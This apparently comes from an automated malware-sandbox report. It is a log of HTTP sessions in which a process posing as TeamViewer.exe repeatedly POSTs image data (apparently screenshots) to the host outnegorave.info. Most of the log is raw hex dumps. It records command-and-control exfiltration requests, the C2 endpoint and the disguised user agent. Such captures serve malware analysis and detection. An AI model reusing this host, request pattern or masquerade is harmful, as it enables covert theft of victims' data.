                                                                                                                                    2021-09-15 11:52:16 UTC1285OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:16 UTC1300OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:16 UTC1316OUTData Raw: a2 80 16 92 8a 5a 00 28 a2 8a 00 5a 05 25 19 a6 21 d4 52 52 d3 00 a2 8a 5a 04 14 b4 51 8a 62 16 96 92 8a 62 03 4a 29 29 45 00 28 a4 a5 14 86 98 82 96 92 81 48 07 0a 70 a6 d2 d5 21 31 68 a4 a5 a6 02 d1 45 14 12 2d 14 51 4c 02 8a 28 a0 43 85 2d 34 52 8a 68 05 a5 a4 a5 a6 48 52 d2 52 8a 60 2d 14 51 4c 42 d1 49 4b 40 82 96 92 96 9a 01 d4 52 0a 5a 64 85 28 a2 8a 60 2d 14 0a 5a 62 12 92 96 8a 00 41 d6 9f 4c 1d 69 f4 20 61 41 a2 8a 64 80 a5 a4 14 ec 50 81 8a 05 3a 9b 4e 15 48 96 27 7a 5a 43 d6 9c 29 80 82 9d 4d a5 14 c4 c5 a2 8a 28 10 0a 5a 41 4e a6 21 29 d4 94 53 06 3a 96 9a 29 69 92 3b 34 a2 9b 4a 29 a1 31 c2 96 9b 4e 14 c9 61 4b 49 45 31 0b 45 25 2d 00 14 b4 94 b4 00 b4 b4 da 75 02 61 4a 29 29 68 10 b4 52 52 d0 20 a5 a2 8a 60 14 a2 8a 51 40 98 b4 0a 4a 51 40
                                                                                                                                    Data Ascii: Z(Z%!RRZQbbJ))E(Hp!1hE-QL(C-4RhHRR`-QLBIK@RZd(`-ZbALi aAdP:NH'zZC)M(ZAN!)S:)i;4J)1NaKIE1E%-uaJ))hRR `Q@JQ@
                                                                                                                                    2021-09-15 11:52:16 UTC1332OUTData Raw: cd 20 a5 a6 02 d1 49 4b 40 0b 45 25 2d 31 0b 45 25 2d 02 16 94 52 52 d3 10 51 49 4b 4c 05 a5 a6 d2 d0 21 c2 8a 4a 5a a1 0a 29 69 b9 a5 a6 21 d9 a5 a6 d2 d0 21 c2 94 53 69 41 aa 4c 96 48 28 a4 06 8a a4 48 b4 b4 94 66 98 58 5c d1 9a 41 4b 45 c5 61 45 2e 69 94 b9 a7 70 b0 fc d2 d3 33 4b 9a 64 d8 70 a5 cd 37 34 53 b8 58 7e 68 cd 37 34 6e f6 a2 e2 b1 20 34 b9 a8 f7 1f 5a 33 ef 4e e2 b1 26 45 19 a8 f3 4b 9a 2e 2b 0f cd 19 a6 e6 8c d3 b8 58 75 2e 69 b4 66 8b 8a c3 b3 4b 9a 66 68 cd 3b 85 87 e6 8c d3 37 52 6e a2 e1 ca 49 9a 33 51 ee a3 75 2b 87 29 26 ea 4d d5 11 7a 69 7a 1c 86 a0 4c 5a 9a 5e a2 2f 4d 2d 52 e6 52 81 29 7a 61 7a 8c b5 30 b5 43 91 6a 04 85 fd e9 85 a9 85 a9 85 aa 1c 8d 14 47 96 a6 16 a6 96 a6 16 ac dc 8d 14 47 13 4c 26 90 9a 4a 86 cb 48 52 69 29 28
                                                                                                                                    Data Ascii: IK@E%-1E%-RRQIKL!JZ)i!!SiALH(HfX\AKEaE.ip3Kdp74SX~h74n 4Z3N&EK.+Xu.ifKfh;7RnI3Qu+)&MzizLZ^/M-RR)zaz0CjGGL&JHRi)(
                                                                                                                                    2021-09-15 11:52:16 UTC1348OUTData Raw: 27 e1 96 97 05 bb 7f 6a 4d 25 dc ee b8 ca 31 45 4f a6 39 27 eb f9 57 3d af fc 35 d4 2c f7 4d a4 49 f6 d8 47 3e 5b 61 65 1f d1 bf 4f a5 33 c4 1f 0e 35 1b 0d d3 69 4c 6f a0 1c ec 03 12 a8 fa 7f 17 e1 cf b5 74 1e 11 f0 36 86 6d 63 be b9 97 fb 46 43 d5 19 76 a4 6d dd 4a 75 c8 ee 1b f2 a4 07 95 cd 14 90 4a d1 4f 1b c7 22 1c 32 3a 90 41 f7 06 99 5d 1f c4 24 48 fc 6b 7e 91 aa a2 28 88 05 51 80 07 94 95 ce 55 08 2a de 9b 64 d7 d7 42 30 76 a0 e5 db d0 55 4a e8 3c 2f b7 17 20 f5 f9 7f 2e 6a 64 ec b4 22 a5 45 4d 73 b5 7b 1b 96 7a 35 b8 4d 96 d6 62 4d a3 92 53 71 fc 6a be a1 e1 c1 70 ac 23 b5 68 66 1d 0a a1 1f 98 ad d1 bf fb 36 dc 45 93 18 ce fc 7f 7f 3d ff 00 0c 56 de 9b e6 fd 85 3c fc ee c9 db bb ae de df d6 b0 c4 d2 95 0c 3a c4 29 6b d8 f4 61 8e a7 5a 7e ca 30 f7
                                                                                                                                    Data Ascii: 'jM%1EO9'W=5,MIG>[aeO35iLot6mcFCvmJuJO"2:A]$Hk~(QU*dB0vUJ</ .jd"EMs{z5MbMSqjp#hf6E=V<:)kaZ~0
                                                                                                                                    2021-09-15 11:52:16 UTC1351OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 31 31 37 37 32 36 37 39 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2011772679--
                                                                                                                                    2021-09-15 11:52:17 UTC1351INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:17 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=127153de5e1f7d888b503269c624b6a1971f3c3d2858f5802cc3b57199055df5; expires=Thu, 15-Sep-2022 11:52:16 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BaAUYsbMiuLJt5SIFB7X0ZZPrRI8pPRmTkOgktaUj8%2F3FiVAswIlnvp%2FoCQnU%2BiOo3z9uHETG07JhowiYu1m%2FHEsfIl6aULcVCYH4lBzVHjooOqzDdXGRBTu6U3rA%2BFEXaz8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5e16a464dc4-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:17 UTC1352INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    16192.168.2.549807172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:18 UTC1352OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84976
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1980331567
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:18 UTC1353OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 39 38 30 33 33 31 35 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1980331567Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:18 UTC1353OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 4f 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^O;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:18 UTC1353OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:18 UTC1369OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:18 UTC1385OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:18 UTC1401OUTData Raw: a5 14 00 a2 92 94 52 1a 62 0a 5a 4a 05 20 1c 29 c2 9b 4b 54 84 c5 a2 92 96 98 0b 45 14 50 48 b4 51 45 30 0a 28 a2 81 0e 14 b4 d1 4a 29 a0 16 96 92 96 99 21 4b 49 4a 29 80 b4 51 45 31 0b 45 25 2d 02 0a 5a 4a 5a 68 07 51 48 29 69 92 14 a2 8a 29 80 b4 50 29 69 88 4a 4a 5a 28 01 07 5a 7d 30 75 a7 d0 81 85 06 8a 29 92 02 96 90 53 b1 42 06 28 14 ea 6d 38 55 22 58 9d e9 69 0f 5a 70 a6 02 0a 75 36 94 53 13 16 8a 28 a0 40 29 69 05 3a 98 84 a7 52 51 4c 18 ea 5a 68 a5 a6 48 ec d2 8a 6d 28 a6 84 c7 0a 5a 6d 38 53 25 85 2d 25 14 c4 2d 14 94 b4 00 52 d2 52 d0 02 d2 d3 69 d4 09 85 28 a4 a5 a0 42 d1 49 4b 40 82 96 8a 29 80 52 8a 29 45 02 62 d0 29 29 45 02 34 34 91 fb f7 3e 88 6a b1 ea 7e b5 6b 49 ff 00 5d 27 fb a6 aa 9e a7 eb 59 2f 8d 84 fe 14 14 51 45 68 64 14 b4 94 b4
                                                                                                                                    Data Ascii: RbZJ )KTEPHQE0(J)!KIJ)QE1E%-ZJZhQH)i)P)iJJZ(Z}0u)SB(m8U"XiZpu6S(@)i:RQLZhHm(Zm8S%-%-RRi(BIK@)R)Eb))E44>j~kI]'Y/QEhd
                                                                                                                                    2021-09-15 11:52:18 UTC1417OUTData Raw: a2 90 1a 2a 91 22 d2 d2 51 9a 61 61 73 46 69 05 2d 17 15 85 14 b9 a6 52 e6 9d c2 c3 f3 4b 4c cd 2e 69 93 61 c2 97 34 dc d1 4e e1 61 f9 a3 34 dc d1 bb da 8b 8a c4 80 d2 e6 a3 dc 7d 68 cf bd 3b 8a c4 99 14 66 a3 cd 2e 68 b8 ac 3f 34 66 9b 9a 33 4e e1 61 d4 b9 a6 d1 9a 2e 2b 0e cd 2e 69 99 a3 34 ee 16 1f 9a 33 4c dd 49 ba 8b 87 29 26 68 cd 47 ba 8d d4 ae 1c a4 9b a9 37 54 45 e9 a5 e8 72 1a 81 31 6a 69 7a 88 bd 34 b5 4b 99 4a 04 a5 e9 85 ea 32 d4 c2 d5 0e 45 a8 12 17 f7 a6 16 a6 16 a6 16 a8 72 34 51 1e 5a 98 5a 9a 5a 98 5a b3 72 34 51 1c 4d 30 9a 42 69 2a 1b 2d 21 49 a4 a4 a3 34 98 ec 21 a2 83 4d a9 29 06 68 a4 a4 a5 71 d8 a1 8e f4 b4 94 57 29 d6 2d 14 51 8a 00 28 a2 8a 04 2d 14 52 50 01 45 14 50 01 4b 49 4b 40 05 14 51 40 82 8a 28 a6 01 45 14 50 01 4b 45 14
                                                                                                                                    Data Ascii: *"QaasFi-RKL.ia4Na4}h;f.h?4f3Na.+.i43LI)&hG7TEr1jiz4KJ2Er4QZZZZr4QM0Bi*-!I4!M)hqW)-Q(-RPEPKIK@Q@(EPKE
                                                                                                                                    2021-09-15 11:52:18 UTC1433OUTData Raw: 37 4d a5 31 be 80 73 b0 0c 4a a3 e9 fc 5f 87 3e d5 d0 78 47 c0 da 19 b5 8e fa e6 5f ed 19 0f 54 65 da 91 b7 75 29 d7 23 b8 6f ca 90 1e 57 34 52 41 2b 45 3c 6f 1c 88 70 c8 ea 41 07 dc 1a 65 74 7f 10 91 23 f1 ad fa 46 aa 88 a2 20 15 46 00 1e 52 57 39 54 20 ab 7a 6d 93 5f 5d 08 c1 da 83 97 6f 41 55 2b a0 f0 be dc 5c 83 d7 e5 fc b9 a9 93 b2 d0 8a 95 15 35 ce d5 ec 6e 59 e8 d6 e1 36 5b 59 89 36 8e 49 4d c7 f1 aa fa 87 87 05 c2 b0 8e d5 a1 98 74 2a 84 7e 62 b7 46 ff 00 ec db 71 16 4c 63 3b f1 fd fc f7 fc 31 5b 7a 6f 9b f6 14 f3 f3 bb 27 6e ee bb 7b 7f 5a c3 13 4a 54 30 eb 10 a5 af 63 d1 86 3a 9d 69 fb 28 c3 dd 3c 5a 68 9e 09 9e 29 54 ab a1 2a c0 f6 34 ca da f1 8f 97 ff 00 09 45 ef 95 8c 6e 5c e3 d7 68 cf eb 58 b5 b5 39 73 c1 4b ba 38 a4 ac da 0a 28 a5 ab 10 52
                                                                                                                                    Data Ascii: 7M1sJ_>xG_Teu)#oW4RA+E<opAet#F FRW9T zm_]oAU+\5nY6[Y6IMt*~bFqLc;1[zo'n{ZJT0c:i(<Zh)T*4En\hX9sK8(R
                                                                                                                                    2021-09-15 11:52:18 UTC1435OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 39 38 30 33 33 31 35 36 37 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1980331567--
                                                                                                                                    2021-09-15 11:52:19 UTC1436INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:19 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=f1b9af3ef651e353edcb5055abe125c3a146f77c3b5c60365fa85d7ff29fea70; expires=Thu, 15-Sep-2022 11:52:18 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KxSG2c2emClXHjILrJ5Og4cpHKUZAs0WjLX%2Bb9I3CB9K3FyskShQx3Vta6%2FGXS8Szy1HnMPCsTrLSVOI4kQtZqn%2FEhsH2AyncU5ZXsPYg%2FnxTu76CkH3gSPai%2FJ2pRxUGqmv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5ea1b0a175e-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:19 UTC1436INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    17192.168.2.549808172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:19 UTC1436OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84961
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2185878550
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:19 UTC1437OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 38 35 38 37 38 35 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2185878550Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:19 UTC1437OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 5e 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^^;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:19 UTC1437OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:19 UTC1453OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
